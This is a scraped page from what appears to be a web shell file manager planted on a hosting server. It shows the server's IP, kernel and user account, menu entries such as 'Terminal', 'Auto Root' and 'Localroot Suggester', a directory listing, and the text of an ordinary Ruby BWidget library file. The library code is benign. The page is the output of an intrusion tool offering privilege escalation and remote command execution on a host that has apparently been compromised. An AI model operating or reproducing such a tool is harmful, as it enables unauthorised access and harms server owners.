Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby22 /
lib64 /
ruby /
2.2.0 /
tkextlib /
Delete
Unzip
Name
Size
Permission
Date
Action
ICONS
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
blt
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
bwidget
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
itcl
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
itk
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
iwidgets
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tcllib
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tclx
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tile
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tkDND
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tkHTML
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tkimg
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tktable
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
tktrans
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
treectrl
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
trofs
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
vu
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
winico
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
ICONS.rb
281
B
-rw-r--r--
2023-07-26 18:01
SUPPORT_STATUS
6.63
KB
-rw-r--r--
2023-07-26 18:01
blt.rb
4.94
KB
-rw-r--r--
2023-07-26 18:01
bwidget.rb
4.48
KB
-rw-r--r--
2023-07-26 18:01
itcl.rb
290
B
-rw-r--r--
2023-07-26 18:01
itk.rb
286
B
-rw-r--r--
2023-07-26 18:01
iwidgets.rb
4.26
KB
-rw-r--r--
2023-07-26 18:01
pkg_checker.rb
4.22
KB
-rw-r--r--
2023-07-26 18:01
setup.rb
304
B
-rw-r--r--
2023-07-26 18:01
tcllib.rb
2.68
KB
-rw-r--r--
2023-07-26 18:01
tclx.rb
277
B
-rw-r--r--
2023-07-26 18:01
tile.rb
12.97
KB
-rw-r--r--
2023-07-26 18:01
tkDND.rb
398
B
-rw-r--r--
2023-07-26 18:01
tkHTML.rb
289
B
-rw-r--r--
2023-07-26 18:01
tkimg.rb
647
B
-rw-r--r--
2023-07-26 18:01
tktable.rb
302
B
-rw-r--r--
2023-07-26 18:01
tktrans.rb
315
B
-rw-r--r--
2023-07-26 18:01
treectrl.rb
297
B
-rw-r--r--
2023-07-26 18:01
trofs.rb
284
B
-rw-r--r--
2023-07-26 18:01
version.rb
91
B
-rw-r--r--
2023-07-26 18:01
vu.rb
968
B
-rw-r--r--
2023-07-26 18:01
winico.rb
325
B
-rw-r--r--
2023-07-26 18:01
Save
Rename
# # BWidget extension support # by Hidetoshi NAGAI (nagai@ai.kyutech.ac.jp) # require 'tk' # call setup script for general 'tkextlib' libraries require 'tkextlib/setup.rb' # call setup script require 'tkextlib/bwidget/setup.rb' # load all image format handlers #TkPackage.require('BWidget', '1.7') TkPackage.require('BWidget') module Tk module BWidget TkComm::TkExtlibAutoloadModule.unshift(self) # Require autoload-symbols which is a same name as widget classname. # Those are used at TkComm._genobj_for_tkwidget method. extend TkCore LIBRARY = tk_call('set', '::BWIDGET::LIBRARY') PACKAGE_NAME = 'BWidget'.freeze def self.package_name PACKAGE_NAME end def self.package_version begin TkPackage.require('BWidget') rescue '' end end def self.XLFDfont(cmd, *args) if args[-1].kind_of?(Hash) keys = args.pop args.concat(hash_kv(keys)) end tk_call('BWidget::XLFDfont', cmd, *args) end def self.assert(exp, msg=None) tk_call('BWidget::assert', exp, msg) end def self.badOptionString(type, value, list) tk_call('BWidget::badOptionString', type, value, list) end def self.bindMouseWheel(widget) tk_call('BWidget::bindMouseWheel', widget) end def self.classes(klass) list(tk_call('BWidget::classes', klass)) end def self.clonename(menu) tk_call('BWidget::clonename', menu) end def self.focus(opt, path) tk_call('BWidget::focus', opt, path) end def self.get3dcolor(path, bgcolor) tk_call('BWidget::get3dcolor', path, bgcolor) end def self.getname(name) tk_call('BWidget::getname', name) end def self.grab(opt, path) tk_call('BWidget::grab', opt, path) end def self.inuse(klass) bool(tk_call('BWidget::inuse', klass)) end def self.library(klass, *klasses) tk_call('BWidget::library', klass, *klasses) end def self.lreorder(list, neworder) tk_call('BWidget::lreorder', list, neworder) end def self.parsetext(text) tk_call('BWidget::parsetext', text) end def self.place(path, w, h, *args) if args[-1].kind_of?(Hash) keys = args.pop args.concat(hash_kv(keys)) end tk_call('BWidget::place', path, w, h, *(args.flatten)) end def self.write(file, mode=None) tk_call('BWidget::write', file, mode) end def self.wrongNumArgsString(str) tk_call('BWidget::wrongNumArgsString', str) end #################################################### autoload :ArrowButton, 'tkextlib/bwidget/arrowbutton' autoload :Bitmap, 'tkextlib/bwidget/bitmap' autoload :Button, 'tkextlib/bwidget/button' autoload :ButtonBox, 'tkextlib/bwidget/buttonbox' autoload :ComboBox, 'tkextlib/bwidget/combobox' autoload :Dialog, 'tkextlib/bwidget/dialog' autoload :DragSite, 'tkextlib/bwidget/dragsite' autoload :DropSite, 'tkextlib/bwidget/dropsite' autoload :DynamicHelp, 'tkextlib/bwidget/dynamichelp' autoload :Entry, 'tkextlib/bwidget/entry' autoload :Label, 'tkextlib/bwidget/label' autoload :LabelEntry, 'tkextlib/bwidget/labelentry' autoload :LabelFrame, 'tkextlib/bwidget/labelframe' autoload :ListBox, 'tkextlib/bwidget/listbox' autoload :MainFrame, 'tkextlib/bwidget/mainframe' autoload :MessageDlg, 'tkextlib/bwidget/messagedlg' autoload :NoteBook, 'tkextlib/bwidget/notebook' autoload :PagesManager, 'tkextlib/bwidget/pagesmanager' autoload :PanedWindow, 'tkextlib/bwidget/panedwindow' autoload :PasswdDlg, 'tkextlib/bwidget/passwddlg' autoload :ProgressBar, 'tkextlib/bwidget/progressbar' autoload :ProgressDlg, 'tkextlib/bwidget/progressdlg' autoload :ScrollableFrame, 'tkextlib/bwidget/scrollableframe' autoload :ScrolledWindow, 'tkextlib/bwidget/scrolledwindow' autoload :ScrollView, 'tkextlib/bwidget/scrollview' autoload :SelectColor, 'tkextlib/bwidget/selectcolor' autoload :SelectFont, 'tkextlib/bwidget/selectfont' autoload :Separator, 'tkextlib/bwidget/separator' autoload :SpinBox, 'tkextlib/bwidget/spinbox' autoload :TitleFrame, 'tkextlib/bwidget/titleframe' autoload :Tree, 'tkextlib/bwidget/tree' autoload :Widget, 'tkextlib/bwidget/widget' end end